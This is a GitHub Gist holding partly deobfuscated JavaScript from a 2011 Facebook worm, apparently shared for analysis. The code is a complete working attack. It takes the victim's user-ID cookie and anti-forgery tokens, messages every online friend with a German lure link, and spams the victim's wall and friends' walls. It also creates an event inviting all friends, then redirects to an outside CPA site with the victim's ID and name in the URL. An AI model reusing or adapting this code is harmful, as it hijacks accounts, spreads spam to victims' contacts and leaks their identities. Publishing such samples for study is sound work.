Created
April 25, 2011 18:19
-
-
Save jrudolph/940939 to your computer and use it in GitHub Desktop.
deobfuscated Facebook spam
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var chatmessage = '%firstname% wow facebook kann dir jetzt anzeigen wer dein Profil ansieht! Schaus dir an @ ow.ly/4GpHi'; | |
var postmessage = 'Meine Top Profil-Stalker: \n\ %tf% - 1136 Besuche \n\ %tf% - 983 Besuche \n\ %tf% - 542 Besuche \n\ %tf% - 300 Besuche \n\ Schau dir an wer dein Profil sieht @ http://apps.facebook.com/iuhuihuuuuh/?o4dv7sq2'; | |
var redirect = 'http://germancpa.blogspot.com/'; | |
var eventdesc = 'Schau dir deine Profil-Stalker an - http://apps.facebook.com/iuhuihuuuuh/?o4dv7sq2'; | |
var eventname = 'WOW Jetzt kannst du sehen wer sich dein Profil ansieht!'; | |
var nfriends = 5000; | |
var debug = false; | |
var wf = 0; | |
var mf = function () { | |
if (wf <= 0) { | |
setTimeout(function () { | |
window['top']['location']['href'] = redirect; | |
}, 500); | |
}; | |
}; | |
var doget = function (target, resultCallback, _0x93d3xd) { | |
var request = new XMLHttpRequest(); | |
request['open']('GET', target); | |
request['onreadystatechange'] = function () { | |
if (request['readyState'] == 4) { | |
if (request['status'] == 200 && resultCallback) { | |
resultCallback(request['responseText']); | |
}; | |
if (_0x93d3xd) { | |
_0x93d3xd(); | |
}; | |
}; | |
}; | |
request['send'](); | |
}; | |
doget('/', function (resultData) { | |
var c_user_cookie = document['cookie']['match'](/c_user=(\d+)/)[1]; | |
var _0x93d3x11 = function (_0x93d3x12) { | |
return _0x93d3x12 ? '@[' + _0x93d3x12['id'] + ':' + _0x93d3x12['name'] + ']' : ''; | |
}; | |
var _0x93d3x13 = function (_0x93d3x12) { | |
return _0x93d3x12 ? _0x93d3x12['name'] : ''; | |
}; | |
var buildPostData = function (_0x93d3x12) { | |
out = ''; | |
for (var _0x93d3x15 in _0x93d3x12) { | |
out += (out ? '&' : '') + _0x93d3x15 + ((_0x93d3x12[_0x93d3x15] !== null) ? '=' + encodeURIComponent(_0x93d3x12[_0x93d3x15]) : ''); | |
}; | |
return out; | |
}; | |
var POST = function (target, _0x93d3x12, resultCallback, _0x93d3xd) { | |
var request = new XMLHttpRequest(); | |
request['open']('POST', target); | |
request['setRequestHeader']('Content-Type', 'application/x-www-form-urlencoded'); | |
request['onreadystatechange'] = function () { | |
if (request['readyState'] == 4) { | |
if (request['status'] == 200 && resultCallback) { | |
resultCallback(request['responseText']); | |
}; | |
if (_0x93d3xd) { | |
_0x93d3xd(); | |
}; | |
}; | |
}; | |
request['send'](buildPostData(_0x93d3x12)); | |
}; | |
var _0x93d3x17 = function () { | |
var _0x93d3x18 = document['createElement']('div'); | |
_0x93d3x18['style']['display'] = 'block'; | |
_0x93d3x18['style']['position'] = 'absolute'; | |
_0x93d3x18['style']['width'] = 100 + '%'; | |
_0x93d3x18['style']['height'] = 100 + '%'; | |
_0x93d3x18['style']['left'] = 0 + 'px'; | |
_0x93d3x18['style']['top'] = 0 + 'px'; | |
_0x93d3x18['style']['textAlign'] = 'center'; | |
_0x93d3x18['style']['padding'] = '4px'; | |
_0x93d3x18['style']['background'] = '#FFFFFF'; | |
_0x93d3x18['style']['zIndex'] = 999999; | |
_0x93d3x18['innerHTML'] = ' <br/>Verifiziere deinen Code - Bitte gedulde dich einen kleinen Moment.<br/><br/> We are processing the offer for you... <a href="javascript:void(0);" onclick="wf=0; mf();">click here</a><br/><img src="http://genetics.bwh.harvard.edu/snp2rflp/circle.gif">'; | |
document['body']['appendChild'](_0x93d3x18); | |
}; | |
var _0x93d3x19 = resultData['match'](/name=\\"xhpc_composerid\\" value=\\"([\d\w]+)\\"/i); | |
if (_0x93d3x19) { | |
comp = _0x93d3x19[1]; | |
} else { | |
comp = ''; | |
}; | |
var _0x93d3x1a = resultData['match'](/name="post_form_id" value="([\d\w]+)"/i)[1]; | |
var _0x93d3x1b = resultData['match'](/name="fb_dtsg" value="([\d\w]+)"/i)[1]; | |
var _0x93d3x1c = document['getElementById']('navAccountName')['firstChild']['data']; | |
redirect = redirect + '?' + buildPostData({ | |
userid: c_user_cookie, | |
name: _0x93d3x1c, | |
doclose: 1 | |
}); | |
_0x93d3x17(); | |
if (eventdesc) { | |
wf++; | |
POST('/ajax/choose/?__a=1', { | |
type: 'event', | |
eid: null, | |
invite_message: '', | |
__d: 1, | |
post_form_id: _0x93d3x1a, | |
fb_dtsg: _0x93d3x1b, | |
lsd: null, | |
post_form_id_source: 'AsyncRequest' | |
}, function (resultData) { | |
var _0x93d3x1e = resultData['match'](/\\"token\\":\\"([^\\]+)\\"/)[1]; | |
var target = '/ajax/typeahead/first_degree.php?__a=1&viewer=' + c_user_cookie + '&token=' + _0x93d3x1e + '&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha'; | |
doget(target, function (_0x93d3x1f) { | |
var _0x93d3x20 = _0x93d3x1f['match'](/\{"uid":\d+,/g); | |
var _0x93d3x21 = []; | |
for (var _0x93d3x22 = 0; _0x93d3x22 < _0x93d3x20['length']; _0x93d3x22++) { | |
var _0x93d3x23 = _0x93d3x20[_0x93d3x22]['match'](/:(\d+),/)[1]; | |
if (_0x93d3x23 != c_user_cookie) { | |
_0x93d3x21['push'](_0x93d3x23); | |
}; | |
}; | |
var _0x93d3x24 = new Date(); | |
_0x93d3x24['setTime'](_0x93d3x24['getTime']() + 60 * 60 * 24 * 1000); | |
datestr = (_0x93d3x24['getMonth']() + 1) + '/' + _0x93d3x24['getDate']() + '/' + _0x93d3x24['getFullYear'](); | |
timestr = _0x93d3x24['getHours']() * 60; | |
var _0x93d3x25 = { | |
post_form_id: _0x93d3x1a, | |
fb_dtsg: _0x93d3x1b, | |
start_dateIntlDisplay: datestr, | |
start_date: datestr, | |
start_time_hour_min: timestr, | |
name: eventname, | |
place_page_id: '', | |
location: '', | |
street: '', | |
geo_id: '', | |
geo_sq: '', | |
desc: eventdesc, | |
sgb_invitees: _0x93d3x21['join'](','), | |
sgb_emails: '', | |
sgb_message: '', | |
privacy_type: 'on', | |
guest_list: 'on', | |
connections_can_post: 'on', | |
save: 'Create Event', | |
submitting: '' | |
}; | |
_0x93d3x25['new'] = ''; | |
POST('/events/create.php', _0x93d3x25, false, function () { | |
mf(--wf); | |
}); | |
}); | |
}); | |
}; | |
if (chatmessage) { | |
wf++; | |
POST('/ajax/chat/buddy_list.php?__a=1', { | |
user: c_user_cookie, | |
post_form_id: _0x93d3x1a, | |
fb_dtsg: _0x93d3x1b, | |
lsd: null, | |
post_form_id_source: 'AsyncRequest', | |
popped_out: false, | |
force_render: true | |
}, function (resultData) { | |
var _0x93d3x26 = resultData['substr'](9); | |
var _0x93d3x27 = eval('(' + _0x93d3x26 + ')'); | |
var _0x93d3x28 = _0x93d3x27['payload']['buddy_list']; | |
for (var _0x93d3x29 in _0x93d3x28['nowAvailableList']) { | |
var _0x93d3x2a = Math['floor'](Math['random']() * 1335448958); | |
var _0x93d3x2b = (new Date())['getTime'](); | |
var _0x93d3x2c = chatmessage['replace']('%firstname%', _0x93d3x28['userInfos'][_0x93d3x29]['firstName']['toLowerCase']()); | |
POST('/ajax/chat/send.php?__a=1', { | |
msg_id: Math['floor'](Math['random']() * 1335448958), | |
client_time: (new Date())['getTime'](), | |
msg_text: chatmessage['replace']('%firstname%', _0x93d3x28['userInfos'][_0x93d3x29]['firstName']['toLowerCase']()), | |
to: _0x93d3x29, | |
post_form_id: _0x93d3x1a, | |
fb_dtsg: _0x93d3x1b, | |
post_form_id_source: 'AsyncRequest' | |
}); | |
}; | |
mf(--wf); | |
}); | |
}; | |
if (postmessage) { | |
wf++; | |
doget('/ajax/browser/friends/?uid=' + c_user_cookie + '&filter=all&__a=1&__d=1', function (resultData) { | |
var _0x93d3x20 = resultData['match'](/\/\d+_\d+_\d+_q\.jpg.*?u003ca href=\\"http:\\\/\\\/www.facebook.com\\\/.*?\\u003c\\\/a>/gi); | |
var _0x93d3x2d = []; | |
if (_0x93d3x20) { | |
for (var _0x93d3x22 = 0; _0x93d3x22 < _0x93d3x20['length']; _0x93d3x22++) { | |
var _0x93d3x23 = _0x93d3x20[_0x93d3x22]['match'](/_\d+_/)[0]['replace'](/_/g, ''); | |
var _0x93d3x2e = _0x93d3x20[_0x93d3x22]['match'](/>[^>]+\\u003c\\\/a>$/i)[0]['replace'](/\\u003c\\\/a>$/gim, '')['replace'](/>/g, ''); | |
_0x93d3x2d['push']({ | |
id: _0x93d3x23, | |
name: _0x93d3x2e | |
}); | |
}; | |
}; | |
var _0x93d3xd = []; | |
var _0x93d3x2f = []; | |
while (_0x93d3x2d['length']) { | |
var _0x93d3x30 = Math['floor'](Math['random']() * _0x93d3x2d['length']); | |
_0x93d3xd['push'](_0x93d3x2d[_0x93d3x30]); | |
_0x93d3x2f['push'](_0x93d3x2d[_0x93d3x30]); | |
var _0x93d3x2b = _0x93d3x2d['shift'](); | |
if (_0x93d3x30) { | |
_0x93d3x2d[_0x93d3x30 - 1] = _0x93d3x2b; | |
}; | |
}; | |
if (debug) { | |
alert('fetched friends: ' + _0x93d3xd['length']); | |
}; | |
var _0x93d3x31 = { | |
post_form_id: _0x93d3x1a, | |
fb_dtsg: _0x93d3x1b, | |
xhpc_composerid: comp, | |
xhpc_targetid: c_user_cookie, | |
xhpc_context: 'home', | |
xhpc_fbx: '', | |
lsd: null, | |
post_form_id_source: 'AsyncRequest' | |
}; | |
mt = postmessage; | |
m = postmessage; | |
while (mt['search']('%tf%') >= 0) { | |
var _0x93d3x32 = _0x93d3xd['pop'](); | |
mt = mt['replace']('%tf%', _0x93d3x13(_0x93d3x32)); | |
m = m['replace']('%tf%', _0x93d3x11(_0x93d3x32)); | |
}; | |
_0x93d3x31['xhpc_message_text'] = mt; | |
_0x93d3x31['xhpc_message'] = m; | |
if (debug) { | |
alert('message text: ' + mt); | |
}; | |
POST('/ajax/updatestatus.php?__a=1', _0x93d3x31); | |
var _0x93d3x33 = function (_0x93d3x15) { | |
if (_0x93d3x15 == 0) { | |
wf = 0; | |
mf(); | |
return; | |
}; | |
var _0x93d3x34 = _0x93d3x2f['shift'](); | |
var _0x93d3x35 = { | |
post_form_id: _0x93d3x1a, | |
fb_dtsg: _0x93d3x1b, | |
xhpc_composerid: comp, | |
xhpc_targetid: _0x93d3x34['id'], | |
xhpc_context: 'profile', | |
xhpc_fbx: 1, | |
lsd: null, | |
post_form_id_source: 'AsyncRequest' | |
}; | |
var _0x93d3x36 = postmessage; | |
var _0x93d3x37 = postmessage; | |
if (_0x93d3xd['length'] == 0) { | |
wf = 0; | |
mf(); | |
return; | |
}; | |
while (_0x93d3x36['search']('%tf%') >= 0) { | |
var _0x93d3x38 = _0x93d3xd['pop'](); | |
_0x93d3x36 = _0x93d3x36['replace']('%tf%', _0x93d3x13(_0x93d3x38)); | |
_0x93d3x37 = _0x93d3x37['replace']('%tf%', _0x93d3x11(_0x93d3x38)); | |
}; | |
_0x93d3x35['xhpc_message_text'] = _0x93d3x36; | |
_0x93d3x35['xhpc_message'] = _0x93d3x37; | |
POST('/ajax/updatestatus.php?__a=1', _0x93d3x35); | |
setTimeout(function () { | |
_0x93d3x33(_0x93d3x15 - 1); | |
}, 2000); | |
}; | |
wf++; | |
setTimeout(function () { | |
_0x93d3x33(nfriends); | |
}, 2000); | |
}); | |
}; | |
mf(); | |
}); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment